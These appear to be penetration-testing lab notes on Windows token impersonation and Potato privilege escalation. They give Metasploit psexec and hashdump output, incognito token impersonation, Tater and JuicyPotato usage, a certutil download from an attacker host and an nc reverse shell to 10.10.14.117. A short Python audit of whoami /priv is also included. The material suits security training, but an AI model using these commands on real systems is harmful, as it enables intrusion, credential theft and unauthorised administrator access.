Token Impersonation - Potato attacks
What is it
Tokens are temporary keys that grant access to a system or network without having to re-supply credentials.
How to
Launch Metasploit
msfconsole
Choose the exploit:
use exploit/windows/smb/psexec
Set rhosts, smbdomain, smbpass, smbuser, target (we can use
show targets
to get a list) and payload.
Launch the attack:
run
We get a shell:
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.0.2.8:4444
[*] 10.0.2.15:445 - Connecting to the server...
[*] 10.0.2.15:445 - Authenticating to 10.0.2.15:445|marvel.local as user 'fcastle'...
[!] 10.0.2.15:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 10.0.2.15:445 - Uploading payload... oeyrkyrs.exe
[*] 10.0.2.15:445 - Created \oeyrkyrs.exe...
[*] Sending stage (200262 bytes) to 10.0.2.15
[+] 10.0.2.15:445 - Service started successfully...
[*] 10.0.2.15:445 - Deleting \oeyrkyrs.exe...
[*] Meterpreter session 1 opened (10.0.2.8:4444 -> 10.0.2.15:61871 ) at 2022-02-11 13:49:12 -0500
meterpreter >
Getting hashes:
hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242:::
Load extra tools:
load
(double tab to get the list of tools)
load incognito

Incognito Commands
==================

    Command              Description
    -------              -----------
    add_group_user       Attempt to add a user to a global group with all tokens
    add_localgroup_user  Attempt to add a user to a local group with all tokens
    add_user             Attempt to add a user with all tokens
    impersonate_token    Impersonate specified token
    list_tokens          List tokens available under current user context
    snarf_hashes         Snarf challenge/response hashes for every token
list_tokens -u
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
Font Driver Host\UMFD-2
MARVEL\Administrator
MARVEL\fcastle
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1
Window Manager\DWM-2

Impersonation Tokens Available
========================================
No tokens available
Impersonate Administrator:
meterpreter > impersonate_token marvel\\administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > shell
Process 8576 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
marvel\administrator
If we run hashdump again it will not work, so we can use rev2self to get back to the initial user.
Any user who has logged in to the target will have a token there until the target reboots.
Potato Attacks
These attacks require the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege privilege to be enabled for the current user on the machine.
Hot potato
We can use Tater:
powershell.exe -nop -ep bypass
Import-Module .\Tater.ps1
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
Your user should now be in the administrators group; run
net localgroup administrators
to check.
See here for an example of a potato attack.
Juicy potato
Enumeration after initial shell with MSSQL
Say we have a shell on an MSSQL instance:
mssqlclient.py sql_dev@IP-ADD -windows-auth
We can enable the command shell using
enable_xp_cmdshell
and then we can run any command we need this way:
xp_cmdshell whoami /priv
We do: the required privilege is listed in the output.
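Added example, not part of the original notes: a small Python audit that parses the output of whoami /priv, as run above, and reports whether the account holds the two privileges the Potato section names, which is equally useful for checking which service accounts on a host expose this prerequisite. Both whoami /priv samples are constructed rather than captured from a real host, and the privilege descriptions follow the standard Windows wording.

```python
# Privileges the Potato family depends on. Assumption behind the check: merely
# holding one (even Disabled) matters, since a process can re-enable it.
POTATO_PRIVILEGES = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Constructed sample of `whoami /priv` for a service account such as the one
# MSSQL runs under (not captured from a real host).
SERVICE_ACCOUNT_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Constructed sample for an ordinary interactive user, who holds neither.
STANDARD_USER_PRIV = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""


def parse_whoami_priv(output: str) -> dict:
    """Parse `whoami /priv` output into {privilege name: state}."""
    privs, in_table = {}, False
    for line in output.splitlines():
        if line.startswith("="):  # the '====' separator row: table rows follow
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        # Names and states never contain spaces, only the description does,
        # so the first and last whitespace-separated tokens are what we need.
        parts = line.split()
        privs[parts[0]] = parts[-1]
    return privs


def potato_exposure(output: str) -> dict:
    """Return the Potato-relevant privileges the token holds, with state."""
    privs = parse_whoami_priv(output)
    return {p: privs[p] for p in POTATO_PRIVILEGES if p in privs}
```

potato_exposure(SERVICE_ACCOUNT_PRIV) returns both privileges with their state, while the standard-user sample returns an empty dict.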
Exploitation
Let's get the JuicyPotato binary on our attacking machine:
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Let's serve the file to our target using Python's HTTP server:
python3 -m http.server 80
Let's fetch it from our shell using certutil:
xp_cmdshell certutil.exe -urlcache -f http://10.10.14.117/JuicyPotato.exe C:\Tools\JuicyPotato.exe
Let's get an admin shell:
xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.117 8443 -e cmd.exe" -t *
where -l is the COM server listening port, -p is the program to launch (cmd.exe), -a is the argument passed to cmd.exe, and -t is the CreateProcess call to use. With -t * we try both CreateProcessWithTokenW and CreateProcessAsUser, which need the SeImpersonate and SeAssignPrimaryToken privileges respectively.